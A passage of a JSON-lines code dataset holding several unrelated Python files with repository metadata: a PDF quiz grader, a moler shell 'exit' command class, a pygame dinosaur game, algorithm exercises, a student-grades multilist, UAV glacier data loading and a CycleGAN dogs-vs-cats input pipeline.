r'C:\\Users\\ASIF\\DataWiz\\general\\frontend\\src\\assets\\fonts\\Gilroy-Bold.ttf')\npdf.add_font('Gilroy-ExtraBold', '', r'C:\\Users\\ASIF\\DataWiz\\general\\frontend\\src\\assets\\fonts\\Gilroy-ExtraBold.ttf')\npdf.add_font('Gilroy-Heavy', '', r'C:\\Users\\ASIF\\DataWiz\\general\\frontend\\src\\assets\\fonts\\Gilroy-Heavy.ttf')\npdf.add_font('Gilroy-Light', '', r'C:\\Users\\ASIF\\DataWiz\\general\\frontend\\src\\assets\\fonts\\Gilroy-Light.ttf')\npdf.add_font('Gilroy-Medium', '', r'C:\\Users\\ASIF\\DataWiz\\general\\frontend\\src\\assets\\fonts\\Gilroy-Medium.ttf')\npdf.add_font('Gilroy-MediumItalic', '', r'C:\\Users\\ASIF\\DataWiz\\general\\frontend\\src\\assets\\fonts\\Gilroy-MediumItalic.ttf')\npdf.add_font('Gilroy-Regular', '', r'C:\\Users\\ASIF\\DataWiz\\general\\frontend\\src\\assets\\fonts\\Gilroy-Regular.ttf')\npdf.add_font('Gilroy-SemiBold', '', r'C:\\Users\\ASIF\\DataWiz\\general\\frontend\\src\\assets\\fonts\\Gilroy-SemiBold.ttf')\npdf.add_font('Gilroy-Thin', '', r'C:\\Users\\ASIF\\DataWiz\\general\\frontend\\src\\assets\\fonts\\Gilroy-Thin.ttf')\n\npdf.add_page()\npdf.set_page_margin()\npdf.set_auto_page_break(auto = True, margin = 15)\n\nfor i in range(0, len(questions)):\n print(f\"FISH: {c_queries[i]}\")\n score, result = auto_grader(c_queries[i], stu_queries[i])\n pdf.print_qs_set(i+1, questions[i], c_queries[i], stu_queries[i], result, score)\n\n\n\npdf.output('quiz_2.pdf')","repo_name":"desracto/DataWiz-Again","sub_path":"app/scripts/pdf_generate.py","file_name":"pdf_generate.py","file_ext":"py","file_size_in_byte":8303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40341259610","text":"# -*- coding: utf-8 -*-\n\"\"\"\nExit command module.\n\"\"\"\n\n__author__ = 'Michal Ernst, Marcin Usielski'\n__copyright__ = 'Copyright (C) 2018-2023, Nokia'\n__email__ = 'michal.ernst@nokia.com, marcin.usielski@nokia.com'\n\n\nfrom moler.cmd.commandchangingprompt import CommandChangingPrompt\n\n\nclass Exit(CommandChangingPrompt):\n def __init__(self, connection, prompt=None, expected_prompt='>', newline_chars=None, runner=None,\n target_newline=\"\\n\", allowed_newline_after_prompt=False, start_command_immediately=True):\n \"\"\"\n :param connection: connection to device.\n :param expected_prompt: prompt on device changed by this command.\n :param prompt: expected prompt sending by device after command execution. Maybe String or compiled re.\n :param newline_chars: new line chars on device (a list).\n :param runner: runner to run command.\n :param target_newline: newline on device when command is finished and prompt is changed.\n :param start_command_immediately: set True to set command_started before execution, False otherwise\n \"\"\"\n super(Exit, self).__init__(connection=connection, prompt=prompt, newline_chars=newline_chars, runner=runner,\n expected_prompt=expected_prompt, target_newline=target_newline,\n allowed_newline_after_prompt=allowed_newline_after_prompt)\n self._cmd_output_started = start_command_immediately\n\n def build_command_string(self):\n \"\"\"\n Returns a string with command.\n\n :return: String with the command.\n \"\"\"\n cmd = \"exit\"\n return cmd\n\n\nCOMMAND_OUTPUT = \"\"\"\namu012@belvedere07:~$ exit\nbash-4.2:~ #\"\"\"\n\nCOMMAND_KWARGS = {\n \"expected_prompt\": r'bash-4.2'\n}\n\nCOMMAND_RESULT = {}\n","repo_name":"nokia/moler","sub_path":"moler/cmd/unix/exit.py","file_name":"exit.py","file_ext":"py","file_size_in_byte":1799,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"78"} +{"seq_id":"34801236891","text":"import pygame\nimport sys\nimport os\nfrom time import sleep\n \npygame.init()\npygame.display.set_caption('Jumping dino')\n\nMAX_WIDTH = 800\nMAX_HEIGHT = 400\nRED = (255, 0, 0)\nbase = os.path.dirname(sys.argv[0])\n\n\nclass Dino(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.dinoImage = pygame.image.load(os.path.join(base, 'images/dino1.png'))\n self.dinoImage2 = pygame.image.load(os.path.join(base, 'images/dino2.png'))\n self.rect = self.dinoImage.get_rect()\n self.rect.centerx = 50\n self.rect.centery = 358\n self.width = self.rect.size[0]\n self.height = self.rect.size[1]\n self.dino_bottom = MAX_HEIGHT - self.height\n self.x_position = 50\n self.y_position = MAX_HEIGHT - self.height\n self.jump_top = 200\n self.is_bottom = True\n self.is_go_up = False\n self.leg_swap = True\n\nclass Tree(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.imgTree = pygame.image.load(os.path.join(base, 'images/tree.png'))\n self.rect = self.imgTree.get_rect()\n self.width = self.rect.size[0]\n self.height = self.rect.size[1]\n self.tree_x_left = MAX_WIDTH\n self.tree_y = MAX_HEIGHT - self.height\n self.rect.centerx = MAX_WIDTH\n self.rect.centery = MAX_HEIGHT - self.height\n\n\ndef main():\n dino = Dino()\n tree = Tree()\n running = True\n finish = False\n start_ticks = pygame.time.get_ticks()\n game_font = pygame.font.Font(None,40)\n\n # set screen, fps\n screen = pygame.display.set_mode((MAX_WIDTH, MAX_HEIGHT))\n fps = pygame.time.Clock()\n\n large_font = pygame.font.SysFont(None, 72)\n while not finish:\n while running:\n screen.fill((255, 255, 255))\n\n # tree move\n tree.tree_x_left -= 12.0\n tree.rect.centerx = tree.tree_x_left\n\n if tree.tree_x_left <= -27:\n tree.tree_x_left = MAX_WIDTH\n tree.rect.centerx = tree.tree_x_left\n\n # draw tree\n screen.blit(tree.imgTree, (tree.tree_x_left, tree.tree_y))\n\n event = pygame.event.poll() # 이벤트 처리\n if event.type == pygame.QUIT:\n running = False\n finish = True \n pygame.quit()\n sys.exit()\n break\n pressed = pygame.key.get_pressed()\n if pressed[pygame.K_SPACE]: # spacebar is jump\n if dino.is_bottom:\n dino.is_go_up = True\n dino.is_bottom = False\n\n # dino jump\n if dino.is_go_up:\n dino.y_position -= 10.0\n dino.rect.centery = dino.y_position\n\n elif not dino.is_go_up and not dino.is_bottom:\n dino.y_position += 10.0\n dino.rect.centery = dino.y_position\n\n if dino.is_go_up and dino.y_position <= dino.jump_top:\n dino.is_go_up = False\n\n if not dino.is_bottom and dino.y_position >= dino.dino_bottom:\n dino.is_bottom = True\n dino.y_position = dino.dino_bottom\n\n # draw dino\n if dino.leg_swap:\n screen.blit(dino.dinoImage, (dino.x_position, dino.y_position))\n dino.leg_swap = False\n else:\n screen.blit(dino.dinoImage2, (dino.x_position, dino.y_position))\n dino.leg_swap = True\n\n screen.blit(dino.dinoImage, (dino.x_position, dino.y_position))\n\n # dino tree collision\n if pygame.sprite.collide_rect(dino, tree):\n success_image = large_font.render('Failure', True, RED)\n current_time = pygame.time.get_ticks() #\n elapsed_time = ( current_time - start_ticks )/1000 # \n timer = game_font.render(str(int(elapsed_time)),True,(255,255,255))\n running = False\n\n # update\n pygame.display.update()\n fps.tick(30)\n \n screen.blit(success_image, (MAX_WIDTH // 2 - success_image.get_width() // 2, MAX_HEIGHT // 2 - success_image.get_height() // 2)) \n screen.blit(timer,(10,10))\n pygame.display.update()\n fps.tick(30)\n event = pygame.event.poll() # 이벤트 처리\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n break\n \nif __name__ == '__main__':\n main()","repo_name":"ans2568/Dino_game","sub_path":"Dino game(leg swap version).py","file_name":"Dino game(leg swap version).py","file_ext":"py","file_size_in_byte":4518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"39227884688","text":"from itertools import combinations\nfrom collections import Counter\n\n\ndef solution(orders, course):\n\n result = []\n\n for c in course:\n\n candidates = []\n cnt = {}\n\n for i in range(len(orders)):\n comb = combinations(orders[i], c)\n for com in comb:\n res = \"\".join(sorted(com))\n candidates.append(res)\n\n cand_cnt = Counter(candidates).most_common()\n\n for k, v in cand_cnt:\n if 2 <= v and v == cand_cnt[0][1]:\n result.append(k)\n\n return sorted(result)\n","repo_name":"unboxing96/ALGO","sub_path":"프로그래머스/lv2/72411. 메뉴 리뉴얼/메뉴 리뉴얼.py","file_name":"메뉴 리뉴얼.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"14361551522","text":"class Node:\n def __init__(self,chave = None):\n self.chave = chave\n self.left = None\n self.right = None\n\n def gerar_arvore(self,lista,ini,fim):\n meio = (ini+fim) // 2\n self.chave = lista[meio]\n if ini <= meio-1:\n self.left = Node()\n self.left.gerar_arvore(lista,ini,meio-1)\n else:\n self.left = None\n if meio+1 <= fim:\n self.right = Node()\n self.right.gerar_arvore(lista,meio+1,fim)\n else:\n self.right = None\n\n def imprimir_pos(self):\n if self.left:\n self.left.imprimir_pos()\n if self.right:\n self.right.imprimir_pos()\n if self.chave:\n print(self.chave,end=' ')\n\n def imprimir_central(self):\n if self.left:\n self.left.imprimir_central()\n if self.chave:\n print(self.chave,end=' ')\n if self.right:\n self.right.imprimir_central()\n\n\nclass Disciplina:\n def __init__(self,nome,nota1,nota2):\n self.nome = nome\n self.nota1 = nota1\n self.nota2 = nota2\n \nclass Aluno:\n def __init__(self,aluno):\n self.aluno = aluno\n self.disciplinas = []\n self.next = None\n \nclass MultiLista:\n def __init__(self):\n self.head = None\n\n def append_aluno(self,n_aluno):\n if self.head:\n aux = self.head\n while aux.next:\n aux = aux.next\n aux.next = Aluno(n_aluno)\n print(\"Aluno cadastrado com sucesso!\")\n else:\n self.head = Aluno(n_aluno)\n print(\"Aluno cadastrado com sucesso!\")\n\n def buscar_aluno(self,n_aluno):\n if self.head:\n aux = self.head\n while aux and not (aux.aluno == n_aluno):\n aux = aux.next\n if aux:\n return aux\n else:\n print(\"Aluno não existente!\")\n\n def append_disciplina(self,n_aluno,n_disciplina,nota1,nota2):\n aux = self.buscar_aluno(n_aluno)\n if aux:\n aux.disciplinas.append(Disciplina(n_disciplina,nota1,nota2))\n print(\"Disciplina cadastrada com sucesso!\")\n else:\n print(\"Aluno não registrado. Retorne ao menu e faço o cadastro do aluno.\")\n\n def remove_aluno(self,n_aluno):\n if self.head:\n aux1 = self.head\n aux2 = None\n if aux1.aluno == n_aluno:\n self.head = aux1.next\n del aux1\n print(\"Aluno removido com sucesso!\")\n else:\n while aux1 and not (aux1.aluno == n_aluno):\n aux2 = aux1\n aux1 = aux1.next\n aux2.next = aux1.next\n del aux1\n print(\"Aluno removido com sucesso!\")\n \n def remove_disciplina(self,n_aluno,n_disciplina):\n aux = self.buscar_aluno(n_aluno)\n for i in range(len(aux.disciplinas)):\n if aux.disciplinas[i].nome == n_disciplina:\n aux.disciplinas.pop(i)\n print(\"Disciplina removida com sucesso!\")\n\n def remover_nota(self,n_aluno,n_disciplina):\n aux = self.buscar_aluno(n_aluno)\n for i in range(len(aux.disciplinas)):\n if aux.disciplinas[i].nome == n_disciplina:\n op = int(input(\"Qual nota que deseja excluir?\\n1 - Nota1\\n2 - Nota2\\n\"))\n if op == 1:\n aux1 = aux.disciplinas[i].nota1\n aux.disciplinas[i].nota1 = None\n del aux1\n print(\"Primeira nota removida com sucesso!\")\n else:\n aux2 = aux.disciplinas[i].nota2\n aux.disciplinas[i].nota2 = None\n del aux2\n print(\"Segunda nota removida com sucesso!\")\n\n def atualizar_aluno(self,n_aluno,n_aluno_atualizado):\n if self.head:\n aux = self.head\n while aux and not(aux.aluno == n_aluno):\n aux = aux.next\n aux.aluno = n_aluno_atualizado\n\n def atualizar_disciplina(self,n_aluno,n_disciplina,n_disciplina_atualizado):\n if self.head:\n aux = self.buscar_aluno(n_aluno)\n for i in range(len(aux.disciplinas)):\n if aux.disciplinas[i].nome == n_disciplina:\n aux.disciplinas[i].nome = n_disciplina_atualizado\n else:\n print(\"Disciplina não encontrada.\")\n\n def atualizar_nota(self,n_aluno,n_disciplina):\n if self.head:\n aux = self.buscar_aluno(n_aluno)\n for i in range(len(aux.disciplinas)):\n if aux.disciplinas[i].nome == n_disciplina:\n op = int(input(\"Qual nota que deseja atualizar?\\n1 - Nota1\\n2 - Nota2:\\n\"))\n if op == 1:\n nota1 = int(input(\"Digite a nota atualizada: \"))\n aux.disciplinas[i].nota1 = nota1\n else:\n nota2 = int(input(\"Digite a nota atualizada: \"))\n aux.disciplinas[i].nota2 = nota2\n print(\"Notas atualizadas com sucesso!\")\n\n def visualizar_alunos_aprovados(self,n_aluno):\n if self.head:\n aux = self.buscar_aluno(n_aluno)\n print(\"--------------------\")\n print('{',aux.aluno,'}',\"- Disciplinas com média maior que 7:\")\n for i in range(len(aux.disciplinas)):\n if aux.disciplinas[i].nota1 and aux.disciplinas[i].nota2:\n if (aux.disciplinas[i].nota1 + aux.disciplinas[i].nota2) / 2 >= 7:\n print(aux.disciplinas[i].nome)\n else:\n print(\"Aluno não possui disciplinas com media de aprovação\")\n\n def visualizar_alunos_reprovados(self,n_aluno):\n if self.head:\n aux = self.buscar_aluno(n_aluno)\n print(\"--------------------\")\n print('{',aux.aluno,'}',\"- Disciplinas com média menor que 7:\")\n for i in range(len(aux.disciplinas)):\n if aux.disciplinas[i].nota1 and aux.disciplinas[i].nota2:\n if (aux.disciplinas[i].nota1 + aux.disciplinas[i].nota2) / 2 < 7:\n print(aux.disciplinas[i].nome)\n else:\n print(\"Aluno não possui disciplinas com media de reprovação\")\n\n def visualizar_media(self,n_aluno,n_disciplina):\n if self.head:\n aux = self.buscar_aluno(n_aluno)\n for i in range(len(aux.disciplinas)):\n if aux.disciplinas[i].nome == n_disciplina:\n if aux.disciplinas[i].nota1 and aux.disciplinas[i].nota2:\n print(\"--------------------\")\n print('{',aux.aluno,'}')\n print(aux.disciplinas[i].nome,\"-\",(aux.disciplinas[i].nota1 + aux.disciplinas[i].nota2) / 2)\n else:\n print(\"Aluno informado possui apenas 1 ou nenhuma nota na disciplina!\")\n\n def gerar_lista(self):\n l = []\n if self.head:\n aux = self.head\n while aux:\n l.append(aux.aluno)\n aux = aux.next\n return l\n\n def imprimir_crescente(self):\n vetor = self.gerar_lista()\n if vetor:\n vetor.sort()\n return vetor\n else:\n return 0\n\n def relatorio_notas(self,n_aluno):\n if self.head:\n aux = self.head\n while aux and not aux.aluno == n_aluno:\n aux = aux.next\n print(\"--------------------\")\n print('{',aux.aluno,'}')\n for i in aux.disciplinas:\n print(i.nome,'-',i.nota1,'-',i.nota2)\n else:\n print(\"Não existem alunos cadastrados!\")\n\nuni = MultiLista()\ntree = Node()\n\nuser = -1\nwhile user != 0:\n print(\"\\n----------MENU----------\")\n print(\"1 - Cadastrar aluno\\n2 - Cadastrar disciplina em aluno\\n3 - Remover aluno\\n4 - Remover disciplina de aluno\\n5 - Remover nota de disciplina de aluno\\n6 - Atualizar aluno\\n7 - Atualizar disciplina de aluno\\n8 - Atualizar nota de disciplina de aluno\\n9 - Visualizar a média do aluno em uma disciplina\\n10 - Visualizar os nomes dos alunos em ordem alfabética\\n11 - Visualizar os nomes dos alunos que estão com média menor que 7\\n12 - Visualizar os nomes dos alunos que estão com média maior ou igual a 7\\n13 - Visualizar as notas das disciplinas cadastradas em um aluno\\n0 - Sair.\\n\")\n user = int(input(\"Digite a sua opção: \\n\"))\n if user == 1:\n print(\"------Cadastrar Aluno------\\n\")\n n_aluno = input(\"Digite o nome do aluno: \")\n uni.append_aluno(n_aluno)\n\n elif user == 2:\n print(\"---Cadastrar disciplina e notas da disciplina---\\n\")\n n_aluno = input(\"Digite o nome do aluno: \")\n n_disciplina = input(\"Informe a disciplina que deseja cadastrar: \\n\")\n nota1 = float(input(\"Informe a primeira nota do aluno: \"))\n nota2 = float(input(\"Informe a segunda nota do aluno: \\n\"))\n uni.append_disciplina(n_aluno,n_disciplina,nota1,nota2)\n\n elif user == 3:\n print(\"------Remover Aluno------\\n\")\n n_aluno = input(\"Informe o aluno que deseja remover: \\n\")\n uni.remove_aluno(n_aluno)\n\n elif user == 4:\n print(\"------Remover Disciplina-------\\n\")\n n_aluno = input(\"Digite o nome do aluno que deseja remover a disciplina: \")\n n_disciplina = input(\"Digite a disciplina do aluno que irá ser removido: \")\n uni.remove_disciplina(n_aluno,n_disciplina)\n\n elif user == 5:\n print(\"----Remover nota de disciplina de aluno----\\n\")\n n_aluno = input(\"Digite o nome do aluno que deseja remover a nota: \") \n n_disciplina = input(\"Informe a disciplina que deseja remover a nota: \\n\")\n uni.remover_nota(n_aluno,n_disciplina)\n\n elif user == 6:\n print(\"------Atualizar Aluno-------\\n\")\n n_aluno = input(\"Informe o aluno que deseja atulizar: \")\n n_aluno_atualizado = input(\"Informe o nome do aluno atualizado: \\n\")\n uni.atualizar_aluno(n_aluno,n_aluno_atualizado)\n\n elif user == 7:\n print(\"-------Atualizar Disciplina---------\\n\")\n n_aluno = input(\"Informe o nome do aluno que deseja atualizar: \")\n n_disciplina = input(\"Informe a disciplina do que o aluno está matriculado: \")\n n_disciplina_atualizado = input(\"Digite o nome atualizado da disciplina: \")\n uni.atualizar_disciplina(n_aluno, n_disciplina,n_disciplina_atualizado)\n\n elif user == 8:\n print(\"-------Atualizar nota do Aluno-------\\n\")\n n_aluno = input(\"Informe o aluno que deseja atualizar as notas: \")\n n_disciplina = input(\"Informe a disciplina do aluno: \")\n uni.atualizar_nota(n_aluno,n_disciplina)\n\n elif user == 9:\n print(\"-----Visualizar média do aluno em uma disciplina------\\n\")\n n_aluno = input(\"Informe o nome do aluno: \")\n n_disciplina = input(\"Informe a disciplina do aluno: \")\n uni.visualizar_media(n_aluno,n_disciplina)\n\n elif user == 10:\n print(\"-----Visualizar os nomes dos alunos em ordem alfabética na arvore-----\\n\")\n lista_alunos = uni.imprimir_crescente()\n if lista_alunos == 0:\n print(\"Não existem alunos cadastrados na arvore!\")\n else:\n tree.gerar_arvore(lista_alunos,0,len(lista_alunos)-1)\n tree.imprimir_central()\n print()\n\n elif user == 11:\n print(\"---Visualizar os nomes dos alunos que estão com média menor que 7---\\n\")\n n_aluno = input(\"Informe o aluno para verificar as médias das disciplinas: \")\n uni.visualizar_alunos_reprovados(n_aluno)\n\n elif user == 12:\n print(\"---Visualizar os nomes dos alunos que estão com média maior que 7---\\n\")\n n_aluno = input(\"Informe o aluno para verificar as médias das disciplinas: \")\n uni.visualizar_alunos_aprovados(n_aluno)\n\n elif user == 13:\n print(\"------Visualizar as notas das disciplinas do aluno-------\\n\")\n n_aluno = input(\"Informe o aluno para verificar as notas das disciplinas: \")\n uni.relatorio_notas(n_aluno)\n\n elif user > 13:\n print(\"Essa opção não está disponível. Retorne ao MENU.\\n\")","repo_name":"Gabrielgln/CodigosFaculdade","sub_path":"Python_2022.1/Unidade2/EstruturaDeDados-Projeto2/MultiLista-e-ArvoreBinaria.py","file_name":"MultiLista-e-ArvoreBinaria.py","file_ext":"py","file_size_in_byte":10961,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42027055582","text":"import random\n\ndef linear_search(list, objective):\n match = False;\n\n for i in list: # O(n)\n if i == objective:\n match = True\n break\n\n return match\n\n\nif __name__ == '__main__':\n list_size = int(input('size list: '))\n objective = int(input('number to search: '))\n\n my_list = [random.randint(0, 100) for i in range(list_size)]\n found = linear_search(my_list, objective)\n\n print(my_list)\n print(f'item {objective} {\"is in the list\" if found else \"not found\"}')","repo_name":"DavidBarcenas/python-course","sub_path":"oop/algorithms/linear_search.py","file_name":"linear_search.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"71478653692","text":"from pprint import pprint\n\n\ndef result1(fileName):\n data = []\n for x in open(fileName):\n data.append(x[:-1])\n result = data[0]\n mapping = data[2:]\n map_dict = {}\n for x in mapping:\n items =x.split(\" -> \")\n map_dict[items[0]] = items[1]\n NR_DAYS = 10\n for i in range(NR_DAYS):\n result_after_day = \"\"\n for j in range(len(result)-1):\n result_after_day = result_after_day + result[j] + map_dict[result[j:j+2]]\n result = result_after_day + result[-1]\n print(i, len(result))\n letters = set(result)\n occur = [result.count(x) for x in letters]\n print(max(occur)-min(occur))\n\ndef result2(fileName):\n data = []\n for x in open(fileName):\n data.append(x[:-1])\n result = data[0]\n mapping = data[2:]\n map_dict = {}\n for x in mapping:\n items = x.split(\" -> \")\n map_dict[items[0]] = items[1]\n NR_DAYS = 40\n count_mapping = {}\n\n # processing initial result\n for i in range(len(result)-1):\n if result[i:i+2] in count_mapping:\n count_mapping[result[i:i+2]] += 1\n else:\n count_mapping[result[i:i+2]] = 1\n\n first_char = result[0]\n last_char = result[-1]\n print(count_mapping)\n for i in range(NR_DAYS):\n new_count_mapping = count_mapping.copy()\n for key in new_count_mapping.keys():\n new_pair1 = key[0]+map_dict[key]\n new_pair2 = map_dict[key]+key[1]\n if new_pair1 in count_mapping:\n count_mapping[new_pair1] += new_count_mapping[key]\n else:\n count_mapping[new_pair1] = new_count_mapping[key]\n if new_pair2 in count_mapping:\n count_mapping[new_pair2] += new_count_mapping[key]\n else:\n count_mapping[new_pair2] = new_count_mapping[key]\n print(count_mapping)\n letters = [x for y in count_mapping.keys() for x in y]\n print(letters)\n unique_letters = set(letters)\n final_count = {}\n for x in unique_letters:\n final_count[x] = 0\n for key in count_mapping.keys():\n for letter in key:\n final_count[letter] += count_mapping[key]\n for key in final_count:\n final_count[key] *= 2\n final_count[first_char] -= 1\n final_count[last_char] -= 1\n occur = [final_count[x] for x in final_count.keys()]\n print(max(occur)-min(occur))\n\n\n\ndef test():\n return result1(\"sample.txt\")\n\n\ndef result2_golf():\n print(\"No way\")\n\n\nif __name__ == \"__main__\":\n # print(test())\n # print(result1(\"input.txt\"))\n print(result2(\"input.txt\"))\n","repo_name":"FrankvanMourik/AOC2021","sub_path":"day14/answer.py","file_name":"answer.py","file_ext":"py","file_size_in_byte":2595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"3631873331","text":"# 1008. Construct Binary Search Tree from Preorder Traversal\n# https://leetcode.com/problems/construct-binary-search-tree-from-preorder-traversal/\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def bstFromPreorder(self, preorder: List[int]) -> TreeNode:\n\n def helper(root, s):\n if root is None:\n return TreeNode(s)\n if root.val > s:\n root.left = helper(root.left, s)\n else:\n root.right = helper(root.right, s)\n return root\n\n root = None\n for i in range(len(preorder)):\n root = helper(root, preorder[i])\n return root\n","repo_name":"harshmalviya7/LeetCode_Coding_Questions","sub_path":"Tree/constructBinarySearchTreeFromPreOrderTraversal.py","file_name":"constructBinarySearchTreeFromPreOrderTraversal.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"449805080","text":"\"\"\"\nLoad all UAV-acquired data into xarray instances.\n\n\"\"\"\n\nimport datetime as dt\nimport xarray as xr\nimport georaster\nimport pandas as pd\nimport pyproj\nimport numpy as np\nimport salem\n\ndef add_srs(xrds, srs, x='x'):\n\tfor v in xrds.variables:\n\t\tif x in xrds[v].dims:\n\t\t\txrds[v].attrs['pyproj_srs'] = srs\n\treturn xrds\n\nuav_times = [dt.datetime(2017,7,15),\n\tdt.datetime(2017,7,20),\n\tdt.datetime(2017,7,21),\n\tdt.datetime(2017,7,22),\n\tdt.datetime(2017,7,23),\n\tdt.datetime(2017,7,24)\n\t]\n\n# UAV classified images \npth = '/scratch/UAV/L3/uav_2017*class*clf20190130_171930.nc'\n#'/scratch/UAV/uav2017_commongrid_bandcorrect/*classified*epsg32622.nc'\nuav_class = xr.open_mfdataset(pth,\n\tconcat_dim='time', chunks={'y':2000, 'x':2000})\n# Set up the time coordinate.\nuav_class['time'] = uav_times \nuav_class = add_srs(uav_class, 'epsg:32622')\n\n# Albedos\nuav_alb = xr.open_mfdataset('/scratch/UAV/uav2017_commongrid_bandcorrect/*albedo*epsg32622.nc',\n\tconcat_dim='time', chunks={'y':2000, 'x':2000})\n# Set up the time coordinate.\nuav_alb['time'] = uav_times \nuav_alb = add_srs(uav_alb, 'epsg:32622')\n\n\n# UAV DEMs\ndem_times = [dt.datetime(2017,7,15),\n\tdt.datetime(2017,7,20),\n\tdt.datetime(2017,7,21),\n\tdt.datetime(2017,7,22),\n\tdt.datetime(2017,7,23)\n\t]\ndems = xr.open_mfdataset('/scratch/UAV/uav2017_dem/*commongrid_epsg32622.nc',\n\tconcat_dim='time')#, chunks={'y':2000, 'x':2000})\n# Set up the time coordinate.\ndems['time'] = dem_times \ndems = add_srs(dems, 'epsg:32622')\n\ndem_upe = xr.open_dataset('/scratch/UAV/photoscan_outputs_2018/uav_20180724_PM_dem_common.nc')\ndem_upe = add_srs(dem_upe, 'epsg:32622')\n\n\n## Load mask to delimit 'good' area of 2017-07-24 flight.\nmsk = georaster.SingleBandRaster('/scratch/UAV/good_area_2017-07-24_3_common.tif')\n# I think it is possible to load geotiffs via xarray/rasterio now?\n\n## Extract UAV albedos at each temporal ground sampling location\n# First convert site coordinates to UTM (only for the temporal sites, numbered 1:5)\nall_gcps = pd.read_csv('/home/at15963/Dropbox/work/data/field_processed_2017/pixel_gcps_kely_formatted.csv', index_col=0)\ntemporal_gcps = {}\nutm = pyproj.Proj('+init=epsg:32623')\nfor\tn in np.arange(1,6):\n\tgcp = all_gcps.loc['GCP%s' %n]\n\tutmx, utmy = utm(gcp.lon, gcp.lat)\n\t# Approximately identify the reflectance measurement center - move towards camp\n\tutmx += 0.4\n\tutmy -= 0.4\n\ttemporal_gcps[n] = {'x':utmx, 'y':utmy}\ntemporal_gcps = pd.DataFrame(temporal_gcps).T\n\n\n## Convert destructive site coordinates to UTM\n\n\n\nshpf = salem.read_shapefile('/scratch/UAV/uav2017_dem/dem2017_commonarea_999.shp')\nuav_poly = salem.read_shapefile('/scratch/UAV/uav_2017_area.shp')\nuav_poly_upe = salem.read_shapefile('/scratch/UAV/uav_2018_area.shp')","repo_name":"atedstone/GrIS_ice_albedo_variability","sub_path":"load_uav_data.py","file_name":"load_uav_data.py","file_ext":"py","file_size_in_byte":2693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1116701684","text":"# Setup the pipeline\nimport numpy as np\nimport tensorflow as tf\nfrom glob import glob\nfrom tensorflow import keras\nfrom tensorflow_examples.models.pix2pix import pix2pix\n\nimport os\nimport time\nimport matplotlib.pyplot as plt\n\nAUTOTUNE = tf.data.AUTOTUNE\n\nprint(tf.__version__)\n\n# Input pipeline\nDATA_FOLDER = '/home/est_posgrado_manuel.suarez/data/dogs-vs-cats/train'\ndog_files = np.array(glob(os.path.join(DATA_FOLDER, 'dog.*.jpg')))\ncat_files = np.array(glob(os.path.join(DATA_FOLDER, 'cat.*.jpg')))\n\nBUFFER_SIZE = len(dog_files)\nBATCH_SIZE = 20\nIMG_WIDTH = 256\nIMG_HEIGHT = 256\n\nn_images = dog_files.shape[0]\nsteps_per_epoch = n_images//BATCH_SIZE\nprint('num image files : ', n_images)\nprint('steps per epoch : ', steps_per_epoch )\n\ndef read_and_decode(file):\n img = tf.io.read_file(file)\n img = tf.image.decode_jpeg(img)\n img = tf.cast(img, tf.float32)\n # img = img / 255.0\n # img = tf.image.resize(img, INPUT_DIM[:2], method=tf.image.ResizeMethod.NEAREST_NEIGHBOR)\n return img\n\ndef load_image(file1):\n return read_and_decode(file1)\n\ndef random_crop(image):\n cropped_image = tf.image.random_crop(\n image, size=[IMG_HEIGHT, IMG_WIDTH, 3])\n\n return cropped_image\n\n# normalizing the images to [-1, 1]\ndef normalize(image):\n image = tf.cast(image, tf.float32)\n image = (image / 127.5) - 1\n return image\n\ndef random_jitter(image):\n # resizing to 286 x 286 x 3\n image = tf.image.resize(image, [286, 286],\n method=tf.image.ResizeMethod.NEAREST_NEIGHBOR)\n\n # randomly cropping to 256 x 256 x 3\n image = random_crop(image)\n\n # random mirroring\n image = tf.image.random_flip_left_right(image)\n\n return image\n\ndef preprocess_image_train(image):\n image = random_jitter(image)\n image = normalize(image)\n return image\n\ndef preprocess_image_test(image):\n image = normalize(image)\n return image\n\n# Dataset's configuration\n# train_dataset = tf.data.Dataset.zip((dog_dataset, cat_dataset))\n# train_dataset = train_dataset.shuffle(buffer_size=n_images, reshuffle_each_iteration=True)\n# train_dataset = train_dataset.map(load_image, num_parallel_calls=tf.data.AUTOTUNE)\n# train_dataset = train_dataset.batch(BATCH_SIZE).repeat()\n\ntrain_dogs = tf.data.Dataset.list_files(dog_files, shuffle=False)\ntrain_dogs = train_dogs.map(load_image, num_parallel_calls=tf.data.AUTOTUNE)\ntrain_dogs = train_dogs.cache().map(\n preprocess_image_train, num_parallel_calls=AUTOTUNE).shuffle(\n BUFFER_SIZE).batch(BATCH_SIZE)\n\ntrain_cats = tf.data.Dataset.list_files(cat_files, shuffle=False)\ntrain_cats = train_cats.map(load_image, num_parallel_calls=tf.data.AUTOTUNE)\ntrain_cats = train_cats.cache().map(\n preprocess_image_train, num_parallel_calls=AUTOTUNE).shuffle(\n BUFFER_SIZE).batch(BATCH_SIZE)\n\nsample_dog = next(iter(train_dogs))\nsample_cat = next(iter(train_cats))\n\nplt.subplot(121)\nplt.title('Dog')\nplt.imshow(sample_dog[0] * 0.5 + 0.5)\n\nplt.subplot(122)\nplt.title('Dog with random jitter')\nplt.imshow(random_jitter(sample_dog[0]) * 0.5 + 0.5)\n\nprint(\"Plotting 